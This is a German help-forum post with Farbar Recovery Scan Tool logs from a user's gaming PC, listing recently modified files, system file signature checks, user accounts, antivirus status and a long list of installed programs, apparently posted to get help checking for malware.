2017-08-01 14:29 - 2017-04-19 20:10 - 000000000 ____D C:\Users\****
2017-08-01 14:28 - 2016-07-13 19:39 - 000000000 ____D C:\Users\****\AppData\Roaming\Spotify
2017-08-01 14:04 - 2015-06-16 18:56 - 000000000 ____D C:\Users\****\AppData\Local\Dropbox
2017-08-01 14:04 - 2015-02-07 15:28 - 000000000 ___RD C:\Users\****\Dropbox
2017-08-01 12:38 - 2017-04-19 20:20 - 003628176 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-08-01 12:38 - 2017-03-20 06:35 - 001756776 _____ C:\WINDOWS\system32\perfh007.dat
2017-08-01 12:38 - 2017-03-20 06:35 - 000437274 _____ C:\WINDOWS\system32\perfc007.dat
2017-08-01 12:34 - 2017-04-19 20:10 - 000000000 ____D C:\ProgramData\NVIDIA
2017-08-01 12:32 - 2017-04-19 20:15 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-08-01 12:32 - 2017-04-19 20:09 - 000248024 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-08-01 12:32 - 2015-03-15 23:24 - 000000000 ____D C:\ProgramData\ProductData
2017-08-01 12:31 - 2017-03-18 13:40 - 001048576 _____ C:\WINDOWS\system32\config\BBI
2017-08-01 12:29 - 2017-05-17 19:05 - 000000000 ____D C:\Users\****\AppData\Local\b95cd
2017-08-01 12:22 - 2015-03-01 21:28 - 000000000 ____D C:\Users\****\AppData\Roaming\Skype
2017-08-01 12:04 - 2016-10-27 18:59 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Driver Booster 4
2017-08-01 12:02 - 2017-04-19 20:15 - 000004182 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{87C32643-1831-40C5-90AB-019E81221598}
2017-08-01 03:53 - 2017-05-09 19:18 - 000000626 _____ C:\Users\Martin
2017-08-01 03:51 - 2017-03-23 02:42 - 000000000 ____D C:\FRST
2017-08-01 03:16 - 2017-03-18 23:01 - 000000000 ____D C:\WINDOWS\INF
2017-08-01 03:15 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\rescache
2017-08-01 02:11 - 2016-01-03 14:51 - 000000000 ____D C:\Users\****\AppData\Local\CrashDumps
2017-08-01 02:04 - 2015-12-12 16:08 - 000000000 ____D C:\Users\****\AppData\Roaming\Mozilla
2017-08-01 01:54 - 2015-02-06 18:54 - 000000000 ____D C:\Users\****\AppData\Local\Google
2017-08-01 01:54 - 2015-02-06 18:54 - 000000000 ____D C:\Program Files (x86)\Google
2017-07-31 20:56 - 2015-02-06 19:26 - 000000000 ____D C:\Users\****\AppData\Roaming\Origin
2017-07-31 20:56 - 2015-02-06 19:25 - 000000000 ____D C:\ProgramData\Origin
2017-07-31 20:21 - 2016-11-04 22:04 - 000000000 ____D C:\Users\****\Documents\Darkest
2017-07-31 20:21 - 2015-05-19 13:16 - 000000000 ____D C:\Users\****\Documents\The Witcher 3
2017-07-31 20:17 - 2015-05-19 12:54 - 000000000 ____D C:\Program Files (x86)\GalaxyClient
2017-07-31 20:02 - 2016-05-04 20:53 - 000000000 ____D C:\ProgramData\Logitech
2017-07-31 20:02 - 2016-05-04 17:52 - 000000000 ____D C:\ProgramData\Squeezebox
2017-07-31 20:02 - 2016-05-02 22:30 - 000000000 ____D C:\Program Files (x86)\Logitech
2017-07-31 19:59 - 2017-03-18 23:03 - 000000000 ___HD C:\Program Files\WindowsApps
2017-07-31 19:59 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\AppReadiness
2017-07-31 19:59 - 2015-02-06 18:49 - 000000000 ____D C:\Users\****\AppData\Local\Packages
2017-07-31 19:41 - 2017-05-09 20:16 - 000000000 ____D C:\WINDOWS\CbsTemp
2017-07-31 19:26 - 2017-06-06 17:27 - 000002212 _____ C:\Users\Public\Desktop\Advanced SystemCare 10.lnk
2017-07-31 19:23 - 2015-03-09 00:28 - 000000000 ____D C:\Users\****\AppData\Local\Ubisoft Game Launcher
2017-07-28 19:41 - 2017-04-19 20:10 - 000000000 ____D C:\ProgramData\NVIDIA Corporation
2017-07-28 19:41 - 2016-03-11 21:30 - 000000000 ____D C:\Program Files (x86)\VulkanRT
2017-07-28 19:41 - 2015-02-03 17:22 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2017-07-28 18:14 - 2017-04-19 20:10 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2017-07-28 18:14 - 2017-04-19 20:10 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2017-07-28 18:14 - 2016-09-29 12:59 - 000001481 _____ C:\Users\Public\Desktop\GeForce Experience.lnk
2017-07-28 18:06 - 2015-04-28 22:14 - 000000865 _____ C:\Users\Public\Desktop\CCleaner.lnk
2017-07-28 13:12 - 2015-12-12 16:06 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2017-07-27 01:16 - 2015-02-06 19:58 - 000000000 ____D C:\Users\****\AppData\Local\Battle.net
2017-07-26 23:16 - 2017-03-06 22:52 - 000000000 ____D C:\Users\****\AppData\Roaming\discord
2017-07-26 23:16 - 2017-03-06 22:52 - 000000000 ____D C:\Users\****\AppData\Local\Discord
2017-07-26 20:23 - 2017-04-19 20:09 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2017-07-26 19:09 - 2016-09-29 12:59 - 001755072 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspbridge64.dll
2017-07-26 19:09 - 2016-09-29 12:59 - 001317312 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspbridge.dll
2017-07-26 19:09 - 2016-09-29 12:59 - 000121280 _____ C:\WINDOWS\system32\NvRtmpStreamer64.dll
2017-07-26 15:40 - 2017-04-06 19:59 - 000001951 _____ C:\WINDOWS\NvTelemetryContainerRecovery.bat
2017-07-25 13:54 - 2015-02-06 19:17 - 000000000 ____D C:\ProgramData\Oracle
2017-07-25 13:53 - 2015-03-15 23:53 - 000000000 ____D C:\Program Files (x86)\Java
2017-07-25 13:53 - 2015-02-06 19:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2017-07-24 19:38 - 2015-02-06 20:39 - 000000000 ____D C:\Users\****\AppData\Local\Turbine
2017-07-19 01:24 - 2017-05-06 18:18 - 000069752 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvshext.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 006463608 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcpl.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 002479040 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvc64.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 001762936 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvcr.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 000549312 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshext.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 000392312 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmctray.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 000081856 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshextr.dll
2017-07-19 00:54 - 2017-04-19 20:10 - 000001951 _____ C:\WINDOWS\NvContainerRecovery.bat
2017-07-18 13:23 - 2015-03-01 21:28 - 000000000 ____D C:\ProgramData\Skype
2017-07-15 22:51 - 2017-03-31 19:55 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Darkest Dungeon [GOG.com]
2017-07-14 19:07 - 2015-02-07 15:26 - 000000000 ____D C:\Users\****\AppData\Roaming\Dropbox
2017-07-13 03:37 - 2017-04-19 20:10 - 008095171 _____ C:\WINDOWS\system32\nvcoproc.bin
2017-07-12 19:39 - 2015-02-06 20:19 - 000000000 ____D C:\ProgramData\Package Cache
2017-07-12 19:33 - 2015-02-06 18:47 - 000000000 __RHD C:\Users\Public\AccountPictures
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ___SD C:\WINDOWS\SysWOW64\F12
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ___SD C:\WINDOWS\system32\F12
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ___RD C:\Program Files\Windows Defender
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\oobe
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\migwiz
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\appraiser
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\ShellExperiences
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\Program Files (x86)\Windows Defender
2017-07-11 21:53 - 2017-04-26 02:29 - 000003778 _____ C:\WINDOWS\System32\Tasks\AviraSystemSpeedupUpdate
2017-07-11 21:53 - 2015-12-12 16:06 - 000000000 ____D C:\Program Files (x86)\Avira
2017-07-11 20:56 - 2015-02-06 20:57 - 000000000 ____D C:\WINDOWS\system32\MRT
2017-07-11 20:54 - 2015-02-06 20:57 - 135225752 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-07-07 22:12 - 2017-03-31 20:13 - 000000000 ____D C:\Users\****\AppData\Local\Warframe

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2017-02-10 19:24 - 2017-02-10 19:24 - 000000824 _____ () C:\Users\****\AppData\Local\recently-used.xbel
2016-11-05 23:04 - 2016-11-05 23:04 - 000000141 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
2015-11-02 23:41 - 2015-11-02 23:41 - 000000098 _____ () C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat

Dateien, die verschoben oder gelöscht werden sollten:
====================
C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat


==================== Bamital & volsnap ======================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\wininit.exe FEHLT <==== ACHTUNG
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert

LastRegBack: 2017-08-01 03:15

==================== Ende von FRST.txt ============================
         

01.08.2017, 15:50   #14
Lost_Viking
 



Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 31-07-2017
durchgeführt von ***** (01-08-2017 15:04:28)
Gestartet von C:\Users\*****\Desktop
Windows 7 Ultimate (X64) (2017-04-19 18:18:33)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-1566530412-1856523912-1524002813-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1566530412-1856523912-1524002813-503 - Limited - Disabled)
Gast (S-1-5-21-1566530412-1856523912-1524002813-501 - Limited - Disabled)
***** (S-1-5-21-1566530412-1856523912-1524002813-1001 - Administrator - Enabled) => C:\Users\*****

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Avira Antivirus (Enabled - Up to date) {B3F630BD-538D-1B4A-14FA-14B63235278F}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avira Antivirus (Enabled - Up to date) {0897D159-75B7-14C4-2E4A-2FC449B26D32}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

3DMark (HKLM\...\{4EC1B8B7-E3B4-4A9F-8005-7AF92DA4DFCF}) (Version: 1.4.828.0 - Futuremark) Hidden
3DMark (HKLM-x32\...\{7330098c-3669-4f39-9e82-4221d489db39}) (Version: 1.4.828.0 - Futuremark)
7-Zip 16.04 (x64) (HKLM\...\7-Zip) (Version: 16.04 - Igor Pavlov)
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 17.009.20058 - Adobe Systems Incorporated)
Advanced SystemCare 10 (HKLM-x32\...\Advanced SystemCare_is1) (Version: 10.4.0 - IObit)
Akamai NetSession Interface (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Akamai) (Version:  - Akamai Technologies, Inc)
Akamai NetSession Interface (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Akamai) (Version:  - Akamai Technologies, Inc)
Ansel (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Ansel) (Version: 384.94 - NVIDIA Corporation) Hidden
ARK: Survival Evolved (HKLM\...\Steam App 346110) (Version:  - Studio Wildcard)
Asmedia ASM104x USB 3.0 Host Controller Driver (HKLM-x32\...\{E4FB0B39-C991-4EE7-95DD-1A1A7857D33D}) (Version: 1.16.12.0 - Asmedia Technology)
AVerMedia C353 HD Capture Device 3.3.64.53 (HKLM-x32\...\AVerMedia C353 HD Capture Device) (Version: 3.3.64.53 - AVerMedia TECHNOLOGIES, Inc.)
Avira Antivirus (HKLM-x32\...\Avira Antivirus) (Version: 15.0.28.28 - Avira Operations GmbH & Co. KG)
Avira Connect (HKLM-x32\...\{661C79C2-D156-419C-81CA-D1A2523B0841}) (Version: 1.2.91.10326 - Avira Operations GmbH & Co. KG) Hidden
Avira Connect (HKLM-x32\...\{dd9049b8-31d1-40bd-8c8c-97a7b087a78f}) (Version: 1.2.91.10326 - Avira Operations GmbH & Co. KG)
Avira Phantom VPN (HKLM-x32\...\Avira Phantom VPN) (Version: 2.9.1.24376 - Avira Operations GmbH & Co. KG)
Avira Software Updater (HKLM-x32\...\{8BCF08B0-0A9D-49C5-8187-38C72FD43336}) (Version: 2.0.3.29917 - Avira Operations GmbH & Co. KG)
Avira System Speedup (HKLM-x32\...\Avira System Speedup_is1) (Version: 3.7.1.5481 - Avira Operations GmbH & Co. KG)
Batman: Arkham City GOTY (HKLM\...\Steam App 200260) (Version:  - Rocksteady Studios)
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Borderlands 2 (HKLM-x32\...\Steam App 49520) (Version:  - Gearbox Software)
CameraHelperMsi (HKLM-x32\...\{15634701-BACE-4449-8B25-1567DA8C9FD3}) (Version: 13.51.815.0 - Logitech) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 5.32 - Piriform)
Command & Conquer™ Red Alert 2 and Yuri’s Revenge (HKLM-x32\...\{F5275D1C-D133-486D-8F07-D6C571F0A8EC}) (Version: 1.0.0.0 - Electronic Arts, Inc.)
Darkest Dungeon (HKLM-x32\...\1450711444_is1) (Version: 20340 - GOG.com)
Deus Ex: Mankind Divided™ (HKLM\...\Steam App 337000) (Version:  - Eidos Montreal)
Discord (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Discord) (Version: 0.0.297 - Hammer & Chisel, Inc.)
Discord (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Discord) (Version: 0.0.297 - Hammer & Chisel, Inc.)
Dragon Age™: Inquisition (HKLM-x32\...\{DC4C36DC-4E5B-4262-B0C7-157DF534B969}) (Version: 1.0.0.12 - Electronic Arts)
Driver Booster 4.4 (HKLM-x32\...\Driver Booster_is1) (Version: 4.4.0 - IObit)
Dropbox (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Dropbox) (Version: 30.4.22 - Dropbox, Inc.)
Dropbox (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Dropbox) (Version: 30.4.22 - Dropbox, Inc.)
Dual-Core Optimizer (HKLM-x32\...\{9FD6F1A8-5550-46AF-8509-271DF0E768B5}) (Version: 1.1.4.0169 - AMD)
Dying Light (HKLM\...\Steam App 239140) (Version:  - Techland)
Elite Dangerous: Horizons (HKLM-x32\...\Steam App 419270) (Version:  - Frontier Developments)
Elite: Dangerous (HKLM-x32\...\Steam App 359320) (Version:  - Frontier Developments)
Endless Space (HKLM-x32\...\Steam App 208140) (Version:  - AMPLITUDE Studios)
erLT (HKLM-x32\...\{3EE9BCAE-E9A9-45E5-9B1C-83A4D357E05C}) (Version: 1.20.138.34 - Logitech, Inc.) Hidden
EVE Online (HKLM\...\Steam App 8500) (Version:  - CCP)
Fallout 4 (HKLM-x32\...\Steam App 377160) (Version:  - Bethesda Game Studios)
Fallout: New Vegas (HKLM-x32\...\Steam App 22380) (Version:  - Obsidian Entertainment)
ForHonor (HKLM-x32\...\Uplay Install 569) (Version:  - Ubisoft)
Free YouTube Download (HKLM-x32\...\Free YouTube Download_is1) (Version: 4.1.44.427 - Digital Wave Ltd)
Futuremark SystemInfo (HKLM-x32\...\{A7E0E8D0-2E06-428A-8A8A-83BFF0B4DFE6}) (Version: 4.34.498.0 - Futuremark)
Galactic Civilizations III (HKLM\...\Steam App 226860) (Version:  - Stardock Entertainment)
GameLauncherRemoval (KCD Beta Access) (HKLM-x32\...\{64189CD8-0B86-4F81-9C05-584E60386D66}) (Version: 1.0.0.0 - Warhorse Studios) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 60.0.3112.78 - Google Inc.)
Google Photos Backup (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Google Photos Backup) (Version: 1.1.2.13 - Google, Inc.)
Google Photos Backup (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Google Photos Backup) (Version: 1.1.2.13 - Google, Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.5 - Google Inc.) Hidden
Guild Wars 2 (HKLM-x32\...\Guild Wars 2) (Version:  - NCsoft Corporation, Ltd.)
Hearthstone (HKLM-x32\...\Hearthstone) (Version:  - Blizzard Entertainment)
Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version:  - Blizzard Entertainment)
HiPatch (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF000}) (Version: 5.0.3.9 - Hi-Rez Studios)
Hi-Rez Studios Authenticate and Update Service (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF1FC}) (Version: 3.0.0.0 - Hi-Rez Studios)
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 10.0.28.1006 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 13.1.0.1058 - Intel Corporation)
Intel(R) Update Manager (HKLM-x32\...\{B991A1BC-DE0F-41B3-9037-B2F948F706EC}) (Version: 3.1.1228 - Intel Corporation)
Jade Empire (HKLM-x32\...\{EEAA7AC3-F651-4842-86E0-4C755181388B}) (Version: 1.0.1.2 - Electronic Arts)
Java 8 Update 141 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180141F0}) (Version: 8.0.1410.15 - Oracle Corporation)
KCD Beta Access (HKLM-x32\...\{d2fb0ffd-876a-49ad-a428-fbb255d5d8d2}) (Version: 4.0 - Warhorse Studios)
KCD Beta Access (HKLM-x32\...\{FD95EDF6-7B9F-4BD1-8DAD-63D8BDD45B96}) (Version: 4.0 - Warhorse Studios) Hidden
League of Legends (HKLM-x32\...\{517CC397-B22F-4593-8DCB-DE72CC541E9A}) (Version: 3.0.1 - Riot Games ) Hidden
League of Legends (HKLM-x32\...\League of Legends 3.0.1) (Version: 3.0.1 - Riot Games )
LEGO® Der Herr der Ringe™ (HKLM-x32\...\{C6F20FA7-342A-47A9-A3C8-EB36CABE6419}) (Version: 1.0.0.0 - Warner Bros. Interactive Entertainment)
Logitech Gaming Software 8.92 (HKLM\...\Logitech Gaming Software) (Version: 8.92.67 - Logitech Inc.)
Logitech SetPoint 6.67 (HKLM\...\sp6) (Version: 6.67.83 - Logitech)
Logitech Webcam-Software (HKLM-x32\...\{D40EB009-0499-459c-A8AF-C9C110766215}) (Version: 2.80 - Logitech Inc.)
Manager (HKLM-x32\...\{2D00EBC4-DD22-4F5B-9BA1-F98ED2C6FCF2}) (Version: 5.0.15.31893 - 2017 pdfforge GmbH. All rights reserved) Hidden
Master of Orion (HKLM\...\Steam App 298050) (Version:  - NGD Studios)
Metro: Last Light (HKLM-x32\...\Steam App 43160) (Version:  - 4A Games)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{F2508213-9989-4E85-A078-72BE483917EF}) (Version: 3.5.88.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM-x32\...\{4CB0307C-565E-4441-86BE-0DF2E4FB828C}) (Version: 3.5.50.0 - Microsoft Corporation)
Microsoft LifeCam (HKLM\...\{5CE7E3F5-9803-4F32-AA89-2D8848A80109}) (Version: 3.60.253.0 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\OneDriveSetup.exe) (Version: 17.3.6816.0313 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\OneDriveSetup.exe) (Version: 17.3.6816.0313 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{3c3aafc8-d898-43ec-998f-965ffdae065a}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
Mordheim: City of the Damned (HKLM-x32\...\Steam App 276810) (Version:  - Rogue Factor)
Mozilla Firefox 54.0.1 (x86 de) (HKLM-x32\...\Mozilla Firefox 54.0.1 (x86 de)) (Version: 54.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 54.0.1 - Mozilla)
MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
MyPhoneExplorer (HKLM-x32\...\MPE) (Version: 1.8.8 - F.J. Wechselberger)
No Man's Sky (HKLM\...\Steam App 275850) (Version:  - Hello Games)
NVIDIA 3D Vision Controller-Treiber 369.04 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 369.04 - NVIDIA Corporation)
NVIDIA 3D Vision Treiber 384.94 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 384.94 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.8.0.89 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.8.0.89 - NVIDIA Corporation)
NVIDIA Grafiktreiber 384.94 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 384.94 - NVIDIA Corporation)
NVIDIA HD-Audiotreiber 1.3.34.27 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.27 - NVIDIA Corporation)
NVIDIA Miracast Virtueller Ton 355.82 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Miracast.VirtualAudio) (Version: 355.82 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.17.0524 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0524 - NVIDIA Corporation)
NvvHci (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvvHci) (Version: 2.02.0.5 - NVIDIA Corporation) Hidden
OLYMPUS Digital Camera Updater (HKLM-x32\...\{962428F4-2E99-4AD2-B55D-B468C18A8A89}) (Version: 2.0.0 - Olympus Corporation)
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
OpenOffice 4.1.3 (HKLM-x32\...\{8D5FCC56-BB9F-4122-923C-71753F50F6F5}) (Version: 4.13.9783 - Apache Software Foundation)
Origin (HKLM-x32\...\Origin) (Version: 10.4.16.25850 - Electronic Arts, Inc.)
Platform (HKLM-x32\...\{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.42 - VIA Technologies, Inc.) Hidden
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.991 - Even Balance, Inc.)
Qualcomm Atheros 11AC Drivers (HKLM\...\{45724D31-7270-4A0B-B236-5119CFDA42DB}) (Version: 1.1.47.1058 - Qualcomm Atheros) Hidden
